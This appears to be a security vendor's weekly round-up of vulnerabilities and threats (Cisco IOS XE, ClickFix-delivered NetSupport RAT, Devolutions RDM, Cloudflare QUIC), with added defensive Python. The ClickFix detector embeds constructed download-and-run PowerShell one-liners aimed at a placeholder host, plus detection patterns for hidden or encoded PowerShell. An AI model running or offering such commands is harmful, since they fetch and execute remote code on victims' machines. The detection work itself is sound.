Exposures, Exposed! Weekly Round-up 
February 17 – February 23


Welcome to the post-Presidents' Day special edition of Exposures, Exposed! - XM Cyber’s weekly roundup of the most critical exposure events. Our dedicated team has been keeping a watchful eye on the cyber world, uncovering vulnerabilities that need your attention. Below, you’ll find this week’s most urgent and noteworthy exposures – because nothing shows leadership like securing your environment!




Salt Typhoon Exploits Cisco Vulnerabilities in Attacks

The Chinese state-sponsored APT group Salt Typhoon has been exploiting two vulnerabilities in Cisco devices, targeting telecommunications providers and universities worldwide. Attributed to China’s Ministry of State Security, Salt Typhoon has been linked to several intrusions, including the compromise of nine US telecom companies disclosed in 2024. Despite public disclosure and sanctions, the group has continued its campaign.

The group chained two flaws in the web UI of Cisco’s IOS XE software: CVE-2023-20198, which lets an unauthenticated attacker create a privilege-level-15 account through the web UI, and CVE-2023-20273, a command injection that such an account can use to run commands as root. Cisco fixed both in October 2023, so every device compromised in this campaign was running a build for which a patch had been available for more than a year. Recorded Future’s Insikt Group, which tracks the activity as RedMike, observed attempts to exploit more than 1,000 Cisco devices globally, more than half of them in the US, South America, and India; the targets included network infrastructure of telecom providers and universities in various countries.
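As an added example (not from the original round-up or from Cisco), here is a small Python audit of an IOS XE running-config that reports whether the web UI these two CVEs live in is enabled and whether an `ip http access-class` restricts who can reach it. The two configuration fragments are constructed for the example. Cisco’s guidance for CVE-2023-20198 was to disable the HTTP server feature on internet-facing systems or restrict it to trusted sources; this script only checks for that state and does not detect exploitation.

```python
import re

# Constructed sample running-config fragments (assumed examples, not any real
# device's configuration). The first leaves the web UI reachable from anywhere;
# the second keeps only HTTPS and limits it to a management ACL.
EXPOSED_CONFIG = """\
hostname edge-rtr-01
!
ip http server
ip http secure-server
ip http authentication local
!
interface GigabitEthernet0/0/0
 description UPLINK to ISP
 ip address 203.0.113.10 255.255.255.252
!
"""

RESTRICTED_CONFIG = """\
hostname edge-rtr-02
!
no ip http server
ip http secure-server
ip http access-class ipv4 MGMT-ONLY
!
ip access-list standard MGMT-ONLY
 permit 192.0.2.0 0.0.0.255
 deny   any
!
"""

# Numbered ('ip http access-class 10') and named ('ip http access-class ipv4 NAME')
# forms both occur on IOS XE.
ACCESS_CLASS = re.compile(r"^ip http access-class (?:ipv4 )?(\S+)$")


def audit_webui(config: str) -> dict:
    """Report how the IOS XE web UI is exposed in a running-config.

    The web UI is the component behind CVE-2023-20198 and CVE-2023-20273, so a
    device with it enabled and reachable from untrusted networks is the one to
    patch first (or to take the web UI off the network).
    """
    http = https = False
    access_class = None
    for raw in config.splitlines():
        line = raw.strip()
        if line == "ip http server":
            http = True
        elif line == "no ip http server":
            http = False
        elif line == "ip http secure-server":
            https = True
        elif line == "no ip http secure-server":
            https = False
        else:
            m = ACCESS_CLASS.match(line)
            if m:
                access_class = m.group(1)
    return {
        "http_enabled": http,
        "https_enabled": https,
        "access_class": access_class,
        # A reachable web UI with no source restriction at all.
        "unrestricted": (http or https) and access_class is None,
    }


if __name__ == "__main__":
    for name, cfg in (("edge-rtr-01", EXPOSED_CONFIG), ("edge-rtr-02", RESTRICTED_CONFIG)):
        print(name, audit_webui(cfg))
```

Feed it the output of `show running-config` from each device; a result with `unrestricted` set to true on an internet-facing box is the one to fix today. An access class only narrows who can reach the web UI, so patching is still required either way.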

The Takeaway: Telecom and network administrators must patch IOS XE, keep the web UI off untrusted networks (disable the HTTP server or restrict it with an access class), and review devices for unexpected privilege-level-15 accounts. Learn more here.


Intel Resolves 374 Vulnerabilities in 2024 Security Effort

Intel addressed 374 vulnerabilities across software, firmware, and hardware in 2024, with roughly half of the issues receiving bug bounty rewards. The majority of bugs (272) were found in software, including utilities, drivers, applications, and SDKs. Intel resolved 81 vulnerabilities in firmware, with UEFI, NUC BIOS, and networking products being the most affected. The company also patched 21 hardware flaws, including issues with processors and Intel SGX.

The total number of resolved vulnerabilities increased by 6% from 2023. Intel proactively discovered and mitigated 94% of firmware flaws and 92% of software flaws. Bug bounty rewards were paid for 53% of the vulnerabilities, with the majority (84%) for software flaws. UEFI was the top bug bounty product category. Intel also addressed several platform firmware vulnerabilities and GPU flaws and maintained a quarterly update process for consistent patching.

The Takeaway: Organizations should track Intel’s quarterly security updates and apply them promptly; most firmware fixes reach end systems only through OEM BIOS and firmware releases, so the OEM’s schedule matters as much as Intel’s. Learn more here.


Increase in Use of NetSupport RAT Threatens Security

Cybersecurity experts report a rise in the use of the NetSupport Remote Access Trojan (RAT), a tool that gives attackers full control over compromised systems. The activity is tied to the "ClickFix" initial access vector (IAV), in which social engineering tricks users into running malicious PowerShell commands themselves. NetSupport Manager was originally developed in 1989 as a legitimate remote IT support tool; weaponized as NetSupport RAT, it lets attackers monitor screens, control keyboards and mice, upload files, and execute commands. Left undetected, it is a common precursor to ransomware, data theft, and operational disruption.

In the ClickFix technique, a fake CAPTCHA page tells the user to copy a command into the Windows Run dialog; the pasted PowerShell then downloads and installs the RAT, so the victim performs the initial execution and no software exploit is needed. To defend against these attacks, organizations should deploy Endpoint Detection and Response (EDR) agents, conduct security awareness training, limit user permissions, and restrict script execution, in particular PowerShell launched from the Run dialog with hidden-window, encoded-command or download-and-run switches.
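The following Python is an added example, not code from the original post or from any vendor: a detection pass over constructed Sysmon-style process-creation events that flags the ClickFix shape, a PowerShell process launched from explorer.exe (the Run dialog) with hidden-window, encoded-command or download-and-execute switches. It decodes `-EncodedCommand` payloads so the indicators inside them are visible too. The events, the `.invalid` host names and the indicator list are the author’s assumptions.

```python
import base64
import re

# A constructed payload of the kind a fake-CAPTCHA page asks the victim to paste
# (the host name uses the reserved .invalid TLD and resolves nowhere).
PASTED_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://captcha-check.invalid/a.txt')"
ENCODED = base64.b64encode(PASTED_COMMAND.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon-style process-creation records (Event ID 1 fields);
# sample data, not real telemetry.
SAMPLE_EVENTS = [
    {   # victim pasted the command into the Run dialog: explorer.exe is the parent
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell.exe -w hidden -nop -ep bypass -c "iex (irm http://captcha-check.invalid/v.txt)"',
    },
    {   # same intent, hidden behind -EncodedCommand
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -nop -enc " + ENCODED,
    },
    {   # benign: scheduled task running a local script
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1",
    },
]

# (pattern, label) pairs matched case-insensitively against the command line
# plus the decoded -EncodedCommand payload, if any.
COMMAND_INDICATORS = [
    (r"-w(?:indowstyle)?\s+hidden\b", "hidden window"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile", "download from web"),
    (r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", "encoded command"),
    (r"-nop\b|-noprofile", "no profile"),
    (r"-ep\s+bypass\b|-executionpolicy\s+bypass", "execution policy bypass"),
]
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Parents that mean a human (or a page they were on) launched the shell.
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Score one process-creation event for the ClickFix pattern."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    haystack = cmd if decoded is None else cmd + " " + decoded
    reasons = [label for pat, label in COMMAND_INDICATORS if re.search(pat, haystack, re.I)]
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    user_launched = parent in USER_PARENTS
    if user_launched:
        reasons.append(f"launched from {parent}")
    # A user-launched shell with any download/obfuscation indicator is the
    # ClickFix shape; otherwise demand several indicators to keep noise down.
    cmd_hits = len(reasons) - (1 if user_launched else 0)
    suspicious = (user_launched and cmd_hits >= 1) or cmd_hits >= 3
    return {"suspicious": suspicious, "reasons": reasons, "decoded": decoded}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev))
```

The parent-process check is what separates this from a generic "suspicious PowerShell" rule: administrators and scheduled tasks rarely start PowerShell from explorer.exe with a hidden window, while a user who just pasted something from a web page does exactly that.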

The Takeaway: Organizations should implement EDR, educate employees, and limit user permissions to prevent RAT infections. Learn more here.


Critical Vulnerabilities Found in Devolutions Remote Desktop Manager

Devolutions has disclosed two severe vulnerabilities in its Remote Desktop Manager (RDM) client that could let an on-path attacker intercept and modify traffic that should be protected by TLS, i.e. a man-in-the-middle (MITM) attack. Both stem from improper certificate validation, and between them they cover every platform RDM ships on. CVE-2025-1193, with a CVSS score of 8.5, affects Windows versions 2024.3.19 and earlier: the client verifies the certificate chain but not that the certificate was issued for the host it is connecting to, so any certificate from a trusted CA, including one the attacker legitimately holds for an unrelated domain, is accepted.

CVE-2024-11621, with a CVSS score of 8.6, affects the macOS, Linux, Android, iOS, and PowerShell versions, where certificate validation is absent entirely: any certificate, including one the attacker self-signs on the spot, is accepted. Affected users should upgrade to the patched versions: Windows 2024.3.20, macOS 2024.3.10.3, Linux 2024.3.2.9, Android 2024.3.4.2, iOS 2024.3.4, and PowerShell 2024.3.7.
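Devolutions’ client is not written in Python, so the following is an added illustration rather than the project’s code: the three validation behaviours described above, expressed as Python `ssl` contexts, with a classifier that states what an on-path attacker would need in each case. The profile names and the `fetch_peer_cert` helper are the author’s.

```python
import socket
import ssl

# Added illustration of the three client behaviours; not Devolutions' code.
PROFILES = ("none", "chain-only", "strict")


def make_context(profile: str) -> ssl.SSLContext:
    """Build a client TLS context in one of three profiles.

    'none'        accepts any certificate, including a self-signed one an
                  attacker generates on the spot (the gap described for
                  CVE-2024-11621)
    'chain-only'  verifies the chain back to a trusted CA but never checks that
                  the certificate was issued for the host being contacted, so any
                  CA-issued certificate, e.g. one the attacker legitimately holds
                  for their own domain, is accepted (the gap described for
                  CVE-2025-1193)
    'strict'      verifies chain and hostname (what a patched client should do)
    """
    ctx = ssl.create_default_context()      # CERT_REQUIRED + check_hostname=True
    if profile == "none":
        ctx.check_hostname = False          # must be cleared before CERT_NONE
        ctx.verify_mode = ssl.CERT_NONE
    elif profile == "chain-only":
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_REQUIRED
    elif profile != "strict":
        raise ValueError(f"unknown profile {profile!r}")
    return ctx


def classify(ctx: ssl.SSLContext) -> str:
    """Say what an on-path attacker needs to impersonate the server under ctx."""
    if ctx.verify_mode == ssl.CERT_NONE:
        return "no validation: any certificate works"
    if not ctx.check_hostname:
        return "chain only: any trusted-CA certificate for any name works"
    return "chain and hostname: attacker needs a trusted certificate for this exact host"


def fetch_peer_cert(host: str, port: int, profile: str = "strict") -> dict:
    """Connect with the chosen profile and return the peer certificate.

    With 'strict' this raises ssl.SSLCertVerificationError on a wrong-host or
    untrusted certificate; the weaker profiles silently accept it.
    """
    ctx = make_context(profile)
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    for p in PROFILES:
        print(f"{p:10s} -> {classify(make_context(p))}")
```

The useful point for reviewing other clients is the middle profile: "the certificate is valid" is not the same check as "the certificate is valid for this host", and a code review that only looks for whether chain verification is turned on will miss the Windows-style bug.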

The Takeaway: Users should immediately upgrade to the latest versions of RDM to protect against MITM attacks. Learn more here.


Cloudflare Patches Critical Broadcast Amplification Vulnerability

Cloudflare recently patched a broadcast amplification vulnerability reported by anonymous security researchers, who found it during QUIC Internet measurement research. The flaw allowed an attacker to send QUIC traffic to the broadcast address of a Cloudflare prefix and trigger a disproportionately large response from Cloudflare servers, causing both CPU load on the servers and reflected amplification toward a spoofed source. The root cause was the improper handling of broadcast addresses in Cloudflare’s infrastructure.

Researchers found that a single QUIC Initial packet sent to a broadcast IP address could elicit far more response data than the sender had transmitted, defeating the three-to-one limit that QUIC (RFC 9000) imposes on a server’s replies before it has validated the client’s address. Cloudflare mitigated the issue by removing the broadcast routes that Linux had created for anycast prefixes configured on its servers’ loopback interfaces. The vulnerability affected UDP-based services and could affect any system with a similar configuration, so Cloudflare recommends that administrators check their own hosts for the same pattern.
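An added example (not Cloudflare’s code) in Python: a check for the routing-table entries described above, run over constructed `ip route show table local` output, plus a worst-case amplification calculation using the RFC 9000 constants. The prefixes and table output are assumed for the example, and the amplification model, in which each receiver of one broadcast datagram answers independently within its own 3x limit, is a simplification the author uses to show how a per-connection cap fails to bound the aggregate.

```python
import ipaddress
import re

# Constructed `ip route show table local` output for a host that has an anycast
# prefix configured on its loopback interface (documentation addresses; not a
# real host). Linux adds a 'broadcast' entry for each such prefix by default.
SAMPLE_LOCAL_TABLE = """\
broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
local 198.51.100.0/24 dev lo proto kernel scope host src 198.51.100.1
broadcast 198.51.100.255 dev lo proto kernel scope link src 198.51.100.1
local 203.0.113.7 dev eth0 proto kernel scope host src 203.0.113.7
broadcast 203.0.113.255 dev eth0 proto kernel scope link src 203.0.113.7
"""

# Prefixes this host announces via anycast (assumed for the example).
ANYCAST_PREFIXES = [ipaddress.ip_network("198.51.100.0/24")]

BROADCAST_RE = re.compile(r"^broadcast (\S+) dev (\S+)")

QUIC_MIN_INITIAL = 1200  # RFC 9000 s.14.1: client Initial datagrams are padded to >= 1200 bytes
QUIC_AMP_LIMIT = 3       # RFC 9000 s.8.1: at most 3x bytes received before address validation


def broadcast_routes_on_loopback(table_text: str, prefixes) -> list:
    """Broadcast destinations routed to 'lo' that fall inside the given prefixes.

    These are the entries Cloudflare removed: with one in place, a datagram sent
    to the prefix's broadcast address is accepted as local traffic.
    """
    hits = []
    for line in table_text.splitlines():
        m = BROADCAST_RE.match(line.strip())
        if not m:
            continue
        addr, dev = ipaddress.ip_address(m.group(1)), m.group(2)
        if dev == "lo" and any(addr in p for p in prefixes):
            hits.append(str(addr))
    return hits


def removal_commands(table_text: str, prefixes) -> list:
    """The `ip route del` lines that would drop those entries (review before use)."""
    return [f"ip route del broadcast {a} dev lo table local"
            for a in broadcast_routes_on_loopback(table_text, prefixes)]


def worst_case_amplification(responders: int, request_bytes: int = QUIC_MIN_INITIAL,
                             limit: int = QUIC_AMP_LIMIT):
    """Bytes an attacker with a spoofed source can elicit from one datagram.

    Model (assumed for illustration): each of `responders` receivers of the same
    datagram answers independently and honours the 3x limit on its own, so the
    per-connection limit still holds while the aggregate does not.
    Returns (total_response_bytes, amplification_factor).
    """
    total = responders * limit * request_bytes
    return total, total / request_bytes


if __name__ == "__main__":
    print(removal_commands(SAMPLE_LOCAL_TABLE, ANYCAST_PREFIXES))
    print(worst_case_amplification(1), worst_case_amplification(16))
```

Run the route check against the real `ip route show table local` output on any host that terminates UDP services on addresses configured on `lo`; the loopback broadcast entries for 127.0.0.0/8 are normal and are deliberately left alone by the prefix filter.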

The Takeaway: Network administrators should check for, and remove, broadcast routes for prefixes configured on loopback to mitigate amplification risks. Learn more here.


Manufacturers Urged to Address Buffer Overflow Vulnerabilities

The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a Secure by Design Alert urging manufacturers to prevent buffer overflow vulnerabilities in their products. The agencies highlighted that buffer overflow vulnerabilities are common software defects that can compromise systems. Despite available mitigation measures, unsafe software practices continue to result in these vulnerabilities.

CISA recommended that manufacturers use memory-safe languages during software development, conduct aggressive product testing, and publish a memory-safety roadmap. The alert stressed the importance of adopting these practices.

The agencies also called on customers to demand safe development practices from manufacturers, including requests for a software bill of materials and a secure software development attestation.

The Takeaway: Manufacturers must adopt memory-safe practices to mitigate buffer overflow vulnerabilities. Learn more here.


That’s all for this week – have any exposures to add to our list? Let us know!




Read our latest blog "From ArgoCD To Azure Hybrid Attacks".

